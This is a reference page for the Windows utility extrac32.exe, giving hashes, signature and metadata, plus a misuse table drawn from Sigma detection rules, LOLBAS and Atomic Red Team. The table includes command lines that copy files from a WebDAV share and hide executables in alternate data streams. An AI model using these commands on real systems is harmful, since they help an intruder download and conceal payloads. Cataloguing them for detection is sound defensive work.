extrac32.exe

  • File Path: C:\WINDOWS\SysWOW64\extrac32.exe
  • Description: Microsoft CAB File Extract Utility

Hashes

  • MD5: F8884E39A620402DA6D6CCA9D7BC3A2B
  • SHA1: C6A6E9F09DEE9984FA11D261F021EDEDBC5980F0
  • SHA256: BD050055F7E9538CD77C7530649CC17ABE9936E488AF82E70DD31749E0593C20
  • SHA384: A9EE1308403832161365ADD8D6D29BBA65562A797700A3098E82EAD42FF1ABEB82FA425D03FB770119606F21DDBDC9A7
  • SHA512: F4A7D1582EC34B296DCCE138067460AE815647C3B2ED52A69036F0F81A8DCC682E6F46CBE6071D36557BBACC001F0DCA4932B287B74375E0FFA8A907C4697F70
  • SSDEEP: 768:wYDhe6vupie/6tnrNZiQoUuPq+GN0ZnFOsuwueArHu3dxH:wOhequp0cQoU+q+IBKueR3d

Runtime Data

Usage (stdout):

Microsoft (R) Cabinet Extraction Tool
Copyright (c) Microsoft Corporation. All rights reserved..

 Cabinet help

11-23-2014  6:00:50p A---       593,606 ReportingEvents.log
05-24-2020 10:20:16p A---     5,312,512 Microsoft-Windows-AppXDeploymentServer-Operational.evtx
05-24-2020 10:20:16p A---    19,992,576 Microsoft-Windows-Store-Operational.evtx
05-24-2020 10:20:18p A---     1,118,208 Microsoft-Windows-WindowsUpdateClient-Operational.evtx
05-24-2020 10:20:18p A---        69,632 Microsoft-Windows-TWinUI-Operational.evtx
06-02-2020 10:29:50p A---       139,264 WindowsUpdate.20200602.222902.536.10.etl
06-02-2020 10:29:54p A---        81,920 WindowsUpdate.20200602.222902.536.11.etl
06-02-2020 10:29:46p A---       139,264 WindowsUpdate.20200602.222902.536.8.etl
06-02-2020 10:29:48p A---       139,264 WindowsUpdate.20200602.222902.536.9.etl
06-02-2020 11:12:54p A---        90,112 WindowsUpdate.20200602.231253.970.1.etl
06-03-2020 11:04:44a A---        16,384 WindowsUpdate.20200603.110442.751.1.etl
06-03-2020  2:02:42p A---        98,304 WindowsUpdate.20200603.140241.068.1.etl
06-03-2020  3:04:48p A---        16,384 WindowsUpdate.20200603.150446.713.1.etl
06-03-2020  4:16:14p A---        16,384 WindowsUpdate.20200603.161612.985.1.etl
06-03-2020  6:07:50p A---       139,264 WindowsUpdate.20200603.180748.524.1.etl
06-03-2020  6:08:06p A---       139,264 WindowsUpdate.20200603.180748.524.2.etl
06-03-2020  6:19:16p A---         8,192 WindowsUpdate.20200603.180748.524.3.etl
06-03-2020  6:21:32p A---       102,400 WindowsUpdate.20200603.182130.427.1.etl
06-03-2020  7:02:24p A---        98,304 WindowsUpdate.20200603.190222.170.1.etl
06-03-2020  7:19:46p A---        20,480 WindowsUpdate.20200603.191944.059.1.etl
06-03-2020  8:02:22p A---       139,264 WindowsUpdate.20200603.200220.394.1.etl
06-03-2020  8:02:26p A---       139,264 WindowsUpdate.20200603.200220.394.2.etl
06-03-2020  8:02:28p A---       139,264 WindowsUpdate.20200603.200220.394.3.etl
06-03-2020  8:02:36p A---        86,016 WindowsUpdate.20200603.200220.394.4.etl
06-03-2020  8:40:24p A---        16,384 WindowsUpdate.20200603.204022.182.1.etl
06-03-2020  9:01:54p A---        20,480 WindowsUpdate.20200603.210152.059.1.etl
06-03-2020  9:15:08p A---        16,384 WindowsUpdate.20200603.211506.884.1.etl
06-03-2020 10:08:26p A---        16,384 WindowsUpdate.20200603.220825.308.1.etl
06-03-2020 11:02:50p A---        32,768 WindowsUpdate.20200603.230248.991.1.etl
06-04-2020 10:16:22a A---        16,384 WindowsUpdate.20200604.101621.122.1.etl
06-04-2020 11:05:48a A---        16,384 WindowsUpdate.20200604.110547.588.1.etl
06-04-2020 12:13:02p A---        16,384 WindowsUpdate.20200604.121301.541.1.etl
06-04-2020  1:30:16p A---        16,384 WindowsUpdate.20200604.133015.279.1.etl
06-04-2020  2:02:42p A---       102,400 WindowsUpdate.20200604.140241.036.1.etl
06-04-2020  3:03:56p ----         8,192 WindowsUpdate.20200604.150354.879.1.etl
                35 Files     29,114,054 bytes

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: extrac32.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 5.00 (WinBuild.160101.0800)
  • Product Version: 5.00
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of extrac32.exe being misused. While extrac32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source          | Source File                               | Example                                                                                    | License
----------------|-------------------------------------------|--------------------------------------------------------------------------------------------|------------------------------
sigma           | proc_creation_win_lolbas_extrac32.yml     | title: Suspicious Extrac32 Execution                                                       | DRL 1.0
sigma           | proc_creation_win_lolbas_extrac32.yml     | description: Download or Copy file with Extrac32                                           | DRL 1.0
sigma           | proc_creation_win_lolbas_extrac32.yml     | - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/                               | DRL 1.0
sigma           | proc_creation_win_lolbas_extrac32.yml     | - extrac32.exe                                                                             | DRL 1.0
sigma           | proc_creation_win_lolbas_extrac32_ads.yml | title: Suspicious Extrac32 Alternate Data Stream Execution                                 | DRL 1.0
sigma           | proc_creation_win_lolbas_extrac32_ads.yml | - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/                               | DRL 1.0
sigma           | proc_creation_win_lolbas_extrac32_ads.yml | - extrac32.exe                                                                             | DRL 1.0
LOLBAS          | Extrac32.yml                              | Name: Extrac32.exe                                                                         |
LOLBAS          | Extrac32.yml                              | - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe                         |
LOLBAS          | Extrac32.yml                              | - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe                |
LOLBAS          | Extrac32.yml                              | - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt                 |
LOLBAS          | Extrac32.yml                              | - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe     |
LOLBAS          | Extrac32.yml                              | - Path: C:\Windows\System32\extrac32.exe                                                   |
LOLBAS          | Extrac32.yml                              | - Path: C:\Windows\SysWOW64\extrac32.exe                                                   |
atomic-red-team | T1564.004.md                              | extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe                                  | MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.